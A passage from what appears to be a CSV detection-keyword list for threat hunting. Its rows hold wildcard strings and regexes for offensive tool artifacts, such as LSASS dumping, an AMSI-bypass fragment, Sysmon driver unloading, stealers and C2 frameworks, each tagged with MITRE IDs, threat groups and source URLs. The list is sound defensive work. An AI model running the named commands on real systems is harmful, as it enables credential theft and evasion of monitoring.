- NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","45157"
"*fishing_with_hollowing*",".{0,1000}fishing_with_hollowing.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","N/A","10","10","122","15","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z","45158"
"*FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==*",".{0,1000}FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","45159"
"*fkasler/cuddlephish*",".{0,1000}fkasler\/cuddlephish.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","45161"
"*Flangvik/NetLoader*",".{0,1000}Flangvik\/NetLoader.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","45162"
"*Flangvik/ObfuscatedSharpCollection*",".{0,1000}Flangvik\/ObfuscatedSharpCollection.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","45163"
"*Flangvik/SharpAppLocker*",".{0,1000}Flangvik\/SharpAppLocker.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","1","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","45164"
"*Flangvik/SharpCollection*",".{0,1000}Flangvik\/SharpCollection.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","45165"
"*Flangvik/SharpExfiltrate*",".{0,1000}Flangvik\/SharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","45166"
"*Flangvik/TeamFiltration*",".{0,1000}Flangvik\/TeamFiltration.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","45167"
"*flashupdate.ps1*",".{0,1000}flashupdate\.ps1.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","45168"
"*flipt-io/reverst*",".{0,1000}flipt\-io\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","45177"
"*flipt-io/reverst*",".{0,1000}flipt\-io\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","45178"
"*floesen/EventLogCrasher*",".{0,1000}floesen\/EventLogCrasher.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","45179"
"*floesen/KExecDD*",".{0,1000}floesen\/KExecDD.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","1","N/A","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","45180"
"*florylsk/NtRemoteLoad*",".{0,1000}florylsk\/NtRemoteLoad.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","45181"
"*fltMC* unload SysmonDrv*",".{0,1000}fltMC.{0,1000}\sunload\sSysmonDrv.{0,1000}","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","45182"
"*FluxionNetwork*",".{0,1000}FluxionNetwork.{0,1000}","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","N/A","10","5207","1430","2023-11-03T23:16:30Z","2017-04-29T10:22:27Z","45183"
"*fnjhmkhhmkbjkkabndcnnogagogbneec*",".{0,1000}fnjhmkhhmkbjkkabndcnnogagogbneec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45184"
"*fnnegphlobjdpkhecapkijjdkgcjhkib*",".{0,1000}fnnegphlobjdpkhecapkijjdkgcjhkib.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45185"
"*fodhelperbypass*",".{0,1000}fodhelperbypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45186"
"*fodhelperUACBypass*",".{0,1000}fodhelperUACBypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45187"
"*Follina.Ninja*",".{0,1000}Follina\.Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45189"
"*follina.py*muban.docx*",".{0,1000}follina\.py.{0,1000}muban\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","45190"
"*Follina/follina.html*",".{0,1000}Follina\/follina\.html.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45191"
"*Follina/Follinadoc*",".{0,1000}Follina\/Follinadoc.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45192"
"*follow_attacker_commands.exe*",".{0,1000}follow_attacker_commands\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","45193"
"*follow_attacker_commands.py*",".{0,1000}follow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","45194"
"*fopen('credentials.txt'*",".{0,1000}fopen\(\'credentials\.txt\'.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","45195"
"*for /f """"tokens=2 delims= """" %*tasklist /fi """"Imagename eq lsass.exe*",".{0,1000}for\s\/f\s\""tokens\=2\sdelims\=\s\""\s\%.{0,1000}tasklist\s\/fi\s\""Imagename\seq\slsass\.exe.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","45196"
"*for /f %%i in (C:\Windows\IME\ok.txt)*",".{0,1000}for\s\/f\s\%\%i\sin\s\(C\:\\Windows\\IME\\ok\.txt\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45199"
"*for /r c:\windows\system32\ %i in (*sht*.exe)*",".{0,1000}for\s\/r\sc\:\\windows\\system32\\\s\%i\sin\s\(.{0,1000}sht.{0,1000}\.exe\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45201"
"*For fun and (no) profit : lets hook rtlcomparememory in lsass.exe*",".{0,1000}For\sfun\sand\s\(no\)\sprofit\s\:\slets\shook\srtlcomparememory\sin\slsass\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","45202"
"*-force-forwardableet-ADComputer*",".{0,1000}\-force\-forwardableet\-ADComputer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45205"
"*--force-ps32 --obfs --amsi-bypass *",".{0,1000}\-\-force\-ps32\s\-\-obfs\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","45206"
"*foreach(`$x in(0..$lwidth)){`$p=`$g.GetPixel(`$x,`$_)*",".{0,1000}foreach\(\`\$x\sin\(0\.\.\$lwidth\)\)\{\`\$p\=\`\$g\.GetPixel\(\`\$x,\`\$_\).{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027.003 - T1027..009 - T1218 - T1216 - T1059","TA0005","N/A","Sandworm Team","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","7","10","2176","399","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z","45208"
"*foreign_access.cna*",".{0,1000}foreign_access\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45209"
"*foreign_lsass * *",".{0,1000}foreign_lsass\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45210"
"*foreign_lsass.c*",".{0,1000}foreign_lsass\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45211"
"*foreign_lsass.x64*",".{0,1000}foreign_lsass\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 